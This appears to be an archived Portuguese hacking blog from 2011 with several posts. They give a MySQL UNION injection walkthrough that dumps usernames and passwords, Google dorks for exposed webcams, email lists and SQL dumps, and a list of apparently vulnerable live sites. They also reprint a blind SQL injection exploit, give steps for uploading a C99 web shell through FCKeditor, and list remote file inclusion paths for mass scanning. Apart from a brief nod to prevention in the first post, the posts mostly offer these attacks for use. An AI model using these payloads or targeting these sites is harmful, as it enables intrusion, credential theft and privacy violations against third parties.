domingo, 30 de janeiro de 2011

Sql Injection - Aprenda e evitar

Sql Injection - Aprenda e evitar


O objetivo do post é apenas mostrar o perigo de um script que permite a exploração dessa falha.


Acredito que muita gente se preocupa mais com a manipulação da string de SQL quando se trata de uma tela de login, onde o usuário digita seu login e senha para ter acesso a uma área restrita de um sistema.


Porém o problema pode ser muito mais grave, do que permitir o acesso a uma área restrita. Um exemplo seria esse mesmo sistema de produtos ou de blog, que receba por GET/POST qual produto mostrar ou qual post o leitor irá visualizar. Se essa string recebida puder ser manipulada um grande estrago pode ser feito. Acho que todos já sabem disso e já leram em diversos lugares.


Mas aqui o objetivo é mostrar como realmente fazer isso e também mostrar uma ferramente que automatiza isso, com o intuito de você testar suas urls para verificar a presença desse tipo de falha.


O código que será postado é um exemplo de um script COM FALHA.
A explicação que você vai ler abaixo foi tirado do site:
[ http://wordsecurity.wordpress.com/2009/12/16/tutorial-mysql-injection/ ]


A ferramenta na qual falei que faz isso de forma automática é a "SqliHelper", que você pode enconrar nesse site: http://reiluke.i.ph/


Aqui segue um passo-a-passo como utilizar a ferramenta:


Onde tem target coloque esse link: http://localhost/index?mes=12&ano=2009


Click em cada um dos botões, um de cada vez:
Inject => Vai testar se o site eh vulneravel
Get Database => Vai aparecer os nomes dos bancos no servidor
Get Tables => Vai mostrar as tabelas do banco de dados q vc selecionou
Get Columns => Vai mostrar as colunas da tabela q vc escolheu


Agora Selecione todos os campos da tabela e por ultimo click em: Dump Now


Você verá que caso uma tabela que contenha senhas, e essas senhas não for criptografada, o invasor terá TODAS as senhas. É importante que você sempre guarde as senhas no banco de forma criptograda, dessa forma mesmo que um usuário tenha acesso as senhas ele não conseguirá ler.


Existe um post no site que fala exatamente como criar uma senha criptografada de forma SEGURA!


http://www.codigopronto.com.br/codigo-ler/7/gera-um-hash-com-salt-aleatorio




----------------------------------------------------------------------
[Tutorial] MySQL Injection [ http://wordsecurity.wordpress.com/2009/12/16/tutorial-mysql-injection/ ]


Então , como muitos sabem uma das falhas de programação web mais encontrada na internet é de banco de dados SQL .
O que posso dizer é que para explorar não necessita de um tipo especifico de requisição ( Post ou Get ) .


Portanto vamos ao tutorial :


Antes de mais nada não é necessariamente necessario algum erro de consulta para saber se esta realmente vul , e sim sua interpretação…


Erros de consultas no mysql_error() para possivelmente vuls , por exemplo :
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/renan/public_html/noticias.php on line 211

&

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘” at line 1


No caso ah erro na consulta , mas não siginifica que em todos sites estaram mostrando .
Muitos dizem que só é possivel explorar caso lhe retorne algum erro , mas nem sempre é necessario…


$id = $_GET;
$q = "SELECT * FROM informativos WHERE id = '$id'";
$r = mysql_query($q) or die(mysql_error());
?>


#################################################


Vamos a pratica :
Se adicionarmos no final de um string uma simples aspas ela ira modificar a syntax retornando algum daqueles erros acima ou não modificaria a pagina.
Nossa query de consulta com aspas no fim da string de um site seria:
SELECT * FROM informativos WHERE id = '3''


Achando Colunas
Voce pode usar duas formas de achar as colunas , por “order by” ou “union+all+select+” .


No caso de “order by” voce fica procurando até aparecer o erro ” unknown column ‘5? in ‘order clause’ ” .
Ja no ” union+all+select+ ” voce adicionaria o numero de strings que representa a qtd de colunas daquele query .
Exemplo
Aqui temos um site onde a quantidade de colunas nos retornara umas string na pagina .
www.site.com.br/informativos.php?id=3+union+all+select+1 Nada

www.site.com.br/informativos.php?id=3+union+all+select+1,2 Nada

www.site.com.br/informativos.php?id=3+union+all+select+1,2,3 Nada

www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,4 Nada

www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,4,5 strings de ex 2,3 e 4


Mas em outros sites voce com esse mesmo tipo de consulta as colunas o erro seria :
” The used SELECT statements have a different number of columns “


——————————————————————–


Informações do host
version() => versão do MySQL
database() => nome do banco de dados da query
user() ou system_user() => usuario do banco de dados
now() => hora e data atual


Exemplo:
www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,version(),5

5.0.54-log



www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,database(),5

renan



www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,user(),5

renan@10.5.3.31



www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,now(),5

2009-08-28 23:19:41


——————————————————————–


Achando Tabelas
Para se achar as colunas acho facil e voce ira compreender meu raciocineo.
Por exemplo voce poderia usar metodo de chute( brute ) de tabelas ou Dumpea-las , mas quando usa-las ?
A nossa resposta é de que versões anteriores do MySQL abaixo de 5.x.y não se pode dumpear então seria por chute , só que versões acima ou ela mesmo voce utiliza o metodo
de achar as colunas por meio de information_schema ( dumpear ) .


concat concatenar = colocar em ordem


group_concat() => busca tudo o que deseja juntamente com caracters em hexadecimal
concat() => busca o que deseja juntamente com caracters em hexadecimal
concat_ws() => une


-> No caso de chute ( brute ) voce utilizaria ” +from+ :
www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,4,5+from+Renan


Se não houver a tabela de nome “Renan” ira nos retornar o erro ” Table ‘database.renan’ doesn’t exist “
Se houver nos retornaria a pagina com as mesmas strings de achado as colunas .


-> No caso de Dumpear :
Temos 2 jeitos bem faceis que voce pode escolher.


=====—————————————————-=====


1º Metodo:
Nesse metodo as tabelas estam em hexadecimal.


renan_usuarios 0x72656e616e5f7573756172696f73


Temos então um site onde queremos pegar todas as tabelas .
www.site.com.br/informativos.php?id=null+union+all+select+1,2,3,group_concat(table_name),5

+from+information_schema.tables where table_schema=database()--
Retornaria-nos as seguintes tabelas postas na pagina :
adm_area,amado_agenda_fotos,amado_cadastros,amado_fotos,amado_usuarios,site_mp3,site_testemunhe,etc.



Comandos:
group_concat(table_name)

+from+information_schema.tables+where+table_schema=database()--


Agora temos de encontrar as colunas de uma determinada tabela .
www.site.com.br/informativos.php?id=null+union+all+select+1,2,3,group_concat(column_name),5

+from+information_schema.columns+where+table_name=0x72656e616e5f7573756172696f73
Retornaria-nos as seguintes colunas postas na pagina de uma tabela :
id,login,senha,email,status


Comandos:
group_concat(column_name)
+from+information_schema.column+where+table_schema=database()--


=====—————————————————-=====


2º Metodo:
Nesse metodo as tabelas estam em decadecimal
Usaremos o limit que funcionara para selecionar as linhas conforme o database
+limit+0,1–

+limit+1,2–

+limit+2,1–

+limit+3,2–

+limit+4,3–
etc…


www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,concat(table_name),5

+from+information_schema.tables+limit+0,1--
Retornaria-nos a seguinte tabelas posta na pagina :
CHARACTER_SETS
Para poder achar as tabelas de logins voce alternaria o limit como acima.
Comandos:
concat(table_name)

+from+information_schema.tables+limit+0,1--



renan_usuarios char(114,101,110,97,110,95,117,115,117,97,114,105,111,115)


www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,concat(column_name),5

+from+information_schema.columns where table_name=

char(114,101,110,97,110,95,117,115,117,97,114,105,111,115)+limit+0,1--
Retornaria-nos a seguinte coluna posta na pagina de uma tabela :
id
Para poder achar as colunas da tabela voce alternaria o limit como acima.
Comandos:
concat(column_name)

+from+information_schema.columns where table_name=char(tabela_em_decimal)+limit+0,1–


e por fim mostrando os dados de logins
www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,

concat(login,0x20,senha),5+from+renan_usuarios

Fonte:http://www.codigopronto.com.br/

terça-feira, 25 de janeiro de 2011

Busca de webcans online

webcan hacking
Fiz essa string para aqueles que gostam de fuçar a vida do próximo  com esse código de busca temos acesso á Aproximadamente 79.900 resultados  (0,31 segundos), em nossa busca exclusão de site que contenham o termo hack,hacker,crack, assim nossa busca fica mais limpa e objetiva.
Quantidade:1 string
Autor:Cleiton Pinheiro
Fonte:blog.inurl.com.br
Código:
+inurl:/control/userimage.html -blog -hack -hacker -crack

String para buscar proxy uma lista

proxy


Proxy é um servidor que atende a requisições repassando os dados do cliente à frente. Um usuário (cliente) conecta-se a um servidor proxy, requisitando algum serviço, como um arquivo, conexão, website, ou outro recurso disponível em outro servidor.
Um servidor proxy pode, opcionalmente, alterar a requisição do cliente ou a resposta do servidor e, algumas vezes, pode disponibilizar este recurso sem nem mesmo se conectar ao servidor especificado. Pode também atuar como um servidor que armazena dados em forma de cache em redes de computadores. São instalados em máquinas com ligações tipicamente superiores às dos clientes e com poder de armazenamento elevado.
Esses servidores têm uma série de usos, como filtrar conteúdo, providenciar anonimato, entre outros.
Um HTTP caching proxy, por exemplo, permite que o cliente requisite um documento na World Wide Web e o proxy procura pelo documento em seu cache. Se encontrado, o documento é retornado imediatamente. Caso contrário, o proxy busca o documento no servidor remoto, entrega-o ao cliente e salva uma cópia no seu cache. Isso permite uma diminuição na latência, já que o servidor proxy, e não o servidor original, é acessado, proporcionando ainda uma redução do uso de banda.



Com isso temos conhecimento da importância de um proxy
criei um dork google pra busca destas listas de proxy disponíveis em sites

String dork
Quantidade:1 string
Autor:Cleiton Pinheiro
Fonte:blog.inurl.com.br
Código:
+":8080" +":3128" +":80" filetype:txt

Lista de proxy

Dorks para scanner de RFI

Remote File Inclusion

Remote File Inclusion (RFI) é um tipo de vulnerabilidade mais freqüentemente encontrados em sites, que permite a um atacante para incluir um arquivo remoto normalmente através de um script no servidor web . The vulnerability occurs due to the use of user supplied input without proper validation. A vulnerabilidade ocorre devido ao uso do produto fornecido a entrada do usuário sem a devida validação. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to: Isso pode levar a algo tão mínimo como saída o conteúdo do arquivo, mas dependendo da gravidade, para listar alguns, pode levar a:
Strings de RFI - INJECTION
uma pequena lista dorks 
Quantidade:Aproximadamente 596strings
Autor:Desconhecido
Fonte:goo.gl/5IPJM

domingo, 23 de janeiro de 2011

Vulnerabilidade em base de email

Vulnerabilidade em base de email
Vulnerabilidade em base de email com os termos "Mailbase +br txt" temos acesso a base de mail de vários sites com email brasileiros e internacionais no formato txt
Quantidade:Aproximadamente 1 string
Autor:Cleiton Pinheiro
Fonte:blog.inurl.com

Código:
inurl:mailbase +br ext:txt

String google Acessando arquivo .SQL de sites em joomla

String google Acessando arquivo .SQL de sites em joomla

Com os termos de pesquisa "+joomla +login +user +admin +pass" o google faz uma varredura atrás dos mesmo, tabelas de usuários;administradores;senhas são nosso alvo principal. geralmente as senhas de users são criptografadas com MD5  , Por isso recomendo alguns sites para descriptografia de senhas.
Quantidade:Aproximadamente 1 string
Autor:Cleiton Pinheiro
Fonte:blog.inurl.com.br
Código:
+joomla  +login|+user|+admin +pass ext:sql

Lista de Dork para Scanner de vulnerabilidade Joomla

Lista de Dork para Scanner de vulnerabilidade Joomla
Joomla! (pronuncia-se djumla) é um Sistema de gestão de conteúdos (Content Management System - CMS) desenvolvido a partir do CMS Mambo. É desenvolvido em PHP e pode ser executado no servidor Web Apache ou IIS e base de dados MySQL.
É um projeto de código aberto (licença GNU/GPL) e a sua última versão estável é a 1.5.21 (em 08 de Outubro de 2010); a sua última versão legada é a 1.0.15. O Joomla! é uma ferramenta de CMS muito poderosa, tendo recebido o "Linux Awards".

Lista de Dork para Scanner de vulnerabilidade Joomla
Quantidade:Aproximadamente 61 strings
Autor:Desconhecido
Fonte:Desconhecido

Strings de SQL - INJECTION

Strings de SQL - INJECTION
Structured Query Language, ou Linguagem de Consulta Estruturada ou SQL, é uma linguagem de pesquisa declarativa para banco de dados relacional (base de dados relacional). Muitas das características originais do SQL foram inspiradas na álgebra relacional.
O SQL foi desenvolvido originalmente no início dos anos 70 nos laboratórios da IBM em San Jose, dentro do projeto System R, que tinha por objetivo demonstrar a viabilidade da implementação do modelo relacional proposto por E. F. Codd. O nome original da linguagem era SEQUEL, acrônimo para "Structured English Query Language" (Linguagem de Consulta Estruturada em Inglês) [1], vindo daí o facto de, até hoje, a sigla, em inglês, ser comumente pronunciada "síquel" ao invés de "és-kiú-él", letra a letra. No entanto, em português, a pronúncia mais corrente é a letra a letra: "ésse-quê-éle".
A linguagem SQL é um grande padrão de banco de dados. Isto decorre da sua simplicidade e facilidade de uso. Ela se diferencia de outras linguagens de consulta a banco de dados no sentido em que uma consulta SQL especifica a forma do resultado e não o caminho para chegar a ele. Ela é uma linguagem declarativa em oposição a outras linguagens procedurais. Isto reduz o ciclo de aprendizado daqueles que se iniciam na linguagem.
Strings de SQL - INJECTION
uma pequena lista dorks 
Quantidade:Aproximadamente 127 strings
Autor:Desconhecido
Fonte:Desconhecido 

Ação PHP (viewfaqs.php) Tem Vulnerabilidade a Blind SQL Injection

Ação PHP  viewfaqs.php Tem Vulnerabilidade a  Blind SQL Injection

Vulnerabilidade divulgada
Data: 2011/01/21Divulgada pelos grupos: darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
 Exploit Code :  
==
[#]Script: PHP auctions
[
#]Version: n/a
[
#]Link: http://phpauctions.info
==
[
#]Author: BorN To K!LL - h4ck3r
==
[
#]3xploit:
/viewfaqs.php?cat=[Blind-Injection]

[
#]3xample:
/viewfaqs.php?cat=2 and substring(version(),1,1)=4 // false ,,
/viewfaqs.php?cat=2 and substring(version(),1,1)=5 // true ,,

Assim temos acesso a versão do DB do site
==
[
#]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"

==

Código de busca google:
inurl:/viewfaqs.php?cat=2

Fonte:goo.gl/I6ayE

Scanneando com strings google e Invadindo site

Scanneando com strings google e Invadindo site

Com esse tutorial simples é rápido vamos aprender como fazer upload em sites rapidamente e depois ter acesso

Etapa 01 -
Acesse o www.google.com.br

Etapa 02 -
A busca use o código de pesquisa sabiamente.
Procure pelo seguinte termo
Código:
inurl:/tabid/36/language/en-US/Default.aspx

Etapa 03 -
Com a busca efetuada Aproximadamente 582 resultados (0,25 segundos) escolha um site de sua preferencia,
e substitua o termo "/tabid/36/language/en-US/Default.aspx" por,
Código:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Exemplo:
www.site.com.br/tabid/36/language/en-US/Default.aspx      -01

www.site.com.br/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx -02


Etapa 04 -Você vai ter um link page.So Gallary onde pode criar urls para dentro dos site
Etapa 05 -Não faça nada por enquanto, abordando fase final.
"A caixa e parecida com essa."
PART 01 Scanneando com strings google e Invadindo site


Etapa 06 -
Agora substitua a URL na barra de endereços com um simples script
"delete o endereço do site e cole o código abaixo"
Código:
javascript:__doPostBack('ctlURL$cmdUpload','')

"Depois do script inserido na barra de endereços a caixa fica assim"
PART 02 Scanneando com strings google e Invadindo site



Etapa 07 -
Você vai encontrar a opção de Upload

Etapa 08 -
Selecione Raiz
  
Etapa 09 -
Envie seu pacote de Seu Shell C99, C100 etc..


OBS: todos esse processos foram feitos para que entenda como funciona
podemos ir deireto á fonte também.
Código:
intext:/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

ou

Código:
*Fck/fcklinkgallery.aspx 

 ou

Código:
intitle:"Link Gallery" +fcklinkgallery ext:aspx

sábado, 22 de janeiro de 2011

Procurando por vulnerabilidade no sistema de forums Vbulletin

Procurando por vulnerabilidade no sistema de forums Vbulletin

Procurando por vulnerabilidade no sistema de forums Vbulletin:
Truque é procurar por "validor.php", todas as versões vbulletin tem esse arquivo por padrão, e seu usado por crackers para "passagem de diretório"
validator.php irá mostrar todos os arquivos, incluindo cópias de segurança de dados armazenados no servidor
Assim voce pode ter acesso ao muitas vezes ao .sql do site que contem logis e senha de adms,

Código de pesquisa copie & cole no google:
allintitle: "DGT Release Checker"


Exemplos de achado:
___________________________________________________________________________ http://www.djs-entertainment.com/mailwor...idator.php
http://halan.plus.vn/4r/validator.php
http://www.niazemarkazi.com/forms/form/validator.php
http://www.bushtectours.co.za/validator.php
http://www.ghandismom.com/validator.php
http://www.davila-law.com/newsletter/validator.php
http://alsrdab.ueuo.com/vb/validator.php
http://www.diendanviet.com/validator.php
http://www.milindex.com.ve/pruebas/whois...idator.php
http://www.alexdrive.co.uk/validator.php
http://guellala.com/scout/vb/validator.php
http://www.tanzaniasports.com/forum/validator.php
http://www.depravacionsexual.com/foros/validator.php
http://periodico-cronicas.com/Estadistic...idator.php
http://www.forum.mera-ghum.com/validator.php
http://greenfriendlywebhosting.com/green...idator.php
http://www.gsm-shorbagy.org/vb/validator.php
http://www.ecoexchange.com.hk/marchform/validator.php
http://tokyo3fansub.com/validator.php
http://www.inabio.edu.ve/foro/validator.php
http://www.gmsartproductions.com/acdigit...idator.php
http://folmmalglobalimited.com/validator.php
http://www.shirbeny.com/demo/blog/Blogsy...idator.php
http://www.mamo4ka.com/personalblogs/upl...idator.php
http://wowsh.3x.ro/validator.php
http://enationalist.3x.ro/forum/validator.php
http://wowsh.3x.ro/validator.php
http://enationalist.3x.ro/forum/validator.php
http://www.renkweb.com/who/validator.php
http://www.milindex.com.ve/pruebas/whois...idator.php
http://animextyle.an.funpic.de/validator.php
http://www.directorio.webasterisco.com/validator.php
http://forum.bnclan.info/validator.php
http://www.tvzaz.com/mailer/validator.php
http://www.ticmic.site11.com/tmp/install...idator.php
http://k38e2.com/forum/validator.php
http://www.holystage.com/vb1/validator.php
http://vn.comze.com/validatorsorry.php
http://www.amnesiac.de/validator.php
http://www.domainauftrag.de/validator.php
http://www.holystage.com/vb0/validator.php
http://www.gsminteractiv.ro/validator.php
http://hunprof.com/wax/validator.php
http://www.keawest.gr/news/validator.php
http://www.airlineticketsa.com/validator.php
http://www.milindex.com.ve/pruebas/domin...idator.php
http://afantasykids.com/mam/validator.php ___________________________________________________________________________

Strings para scanner # SQL Injection Dork List #

Strings para scanner Dorck: RFI PHP SQL - Injection

# SQL Injection Dork List #
SQL Injection ou injeção de SQL é uma técnica de invasão de sistemas que se tornou famosa na Internet, mas pode ser utilizada em qualquer linguagem de programação. No entanto, na Internet temos uma combinação explosiva:
  • A aplicação está acessível para toda internet que possui milhares de usuários dispostos a quebrar seu sistema;
  • O uso de linguagens de script fracamente tipadas em conjunto com com tipos de dados fracamente tipados ajuda a abrir algumas brexas de segurança.
  • O protocolo HTTP tem peculiaridades que quando mal utilizadas podem tornar uma aplicação web mais vulnerável como o uso de parâmetros GET.
    Mais conceito
===========================
site:.gov.br +sql +error inurl:"id="
index.php?option=com_mambads
inurl:index.php?option=com_expose
intitle:guestbook  "advanced guestbook 2.2 powered"
filetype:asp inurl:"shopdisplayproducts.asp
"Powered by: vBulletin * 3.0.1"  inurl:newreply.php
"Powered by Invision Power Board(U) v1.3 Final"
inurl:gotoURL.asp?url=
inurl:comersus_message.asp
ext:pl inurl:cgi intitle:"FormMail *"  -"*Referrer" -"* Denied" -sourceforge -error -cvs -input
inurl:"dispatch.php?atknodetype" |  inurl:class.at
"Powered by Gallery v1.4.4"
inurl:/cgi-bin/index.cgi inurl:topics inurl:viewca
inurl:"/becommunity/community/index.php?pageurl="
"Powered *: newtelligence" ("dasBlog 1.6"| "dasBlog 1.5"| "dasBlog 1.4"|"dasBlog 1.3")
filetype:cgi inurl:tseekdir.cgi
filetype:php inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages| viewpage | listcat)
intitle:"WordPress > * > Login form" inurl:"wp-login.php"
intitle: Index of finance.xls
intitle:index.of passwd passwd.bak
allinurl:loc_id "mod.php?mod=calendar"
allinurl:"mod php mod publisher"artid
allinurl:"mod.php?mod=gallery" id

Programa scanner dork php - sql injection rfi

scanner dork rfi - sql - php

DorkTools Versão 5.0 é um programa simples para procurar vulneráveis na Internet usando google consulta.
Feito em VB 6.0, já vem com uma biblioteca de strings com fonte em txt, que pode ser alterada de acordo com as necessidades do usuário.
[=] Resultado mais fresco
[=] Não precisa MSINET.OCX
[=] Não precisa Mscomctl.ocx
[=] Não precisa DLL

Baixar: goo.gl/uAHBl

Uma lista Strins de pesquisa para busca de vulnerabilidades á php injection

Uma lista Strings de pesquisa para busca de vulnerabilidades á php injection

As strings abaixo são direcionadas para scanners RFI - defaces que gostam de um bom scan em ssh rodar aquele velho bot-scanner testar se é safe off! ou safe on! vai gostar das strings á seguir acompanhadas de seus respectivos dorks dando um auxilio para bot encontrar seu site vul.
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=
---------------------------------------------------------------
 
Google dork:
inurl:\"com_hashcash\"

CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=

------------------------------------------------------------------------------
 
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
------------------------------------------------------------------------------------
 
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
--------------------------------------------------------------------
 
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=
--------------------------------------------------------------------
 
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
-----------------------------------------------------------------------------------
 
Google dork:
inurl:index.php?option=com_extcalendar
CODE:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=

-----------------------------------------------------------------------
 
Google dork:
inurl:\"minibb\"
CODE:
components/minibb/index.php?absolute_path=
---------------------------------------------------------------------
 
Google dork:
inurl:\"com_smf\"
CODE:
/components/com_smf/smf.php?mosConfig_absolute_path=

-----------------------------------------------------------------------
CODE:
/modules/mod_calendar.php?absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_pollxt\"
CODE:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_loudmounth\"
CODE:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
------------------------------------------------------------------------
 
Google dork:
inurl:\"com_videodb\"
CODE:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:index.php?option=com_pcchess
CODE:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_multibanners\"
CODE:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht Linkleri görebilmek için ÜYE olmalısınız
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_a6mambohelpdesk\"
Google dork:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_colophon\"
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_mgm\"
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_mambatstaff\"
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_securityimages\"
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_artlinks\"
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
 
Google dork:
inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=

----------------------------------------------------------------------- 
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=
----------------------------------------------------------------------- 
Google dork:
inurl:\"com_hashcash\"

CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=

----------------------------------------------------------------------- 
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
----------------------------------------------------------------------- 
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=

----------------------------------------------------------------------- 
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=
--------------------------------------------------------------------
 
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_hashcash\"

CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=

-------------------------------------------------------------------- 
Google dork:

inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_colophon\"
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_mgm\"
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_mambatstaff\"
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_securityimages\"
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_artlinks\"
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=

Fonte:
goo.gl/cVZve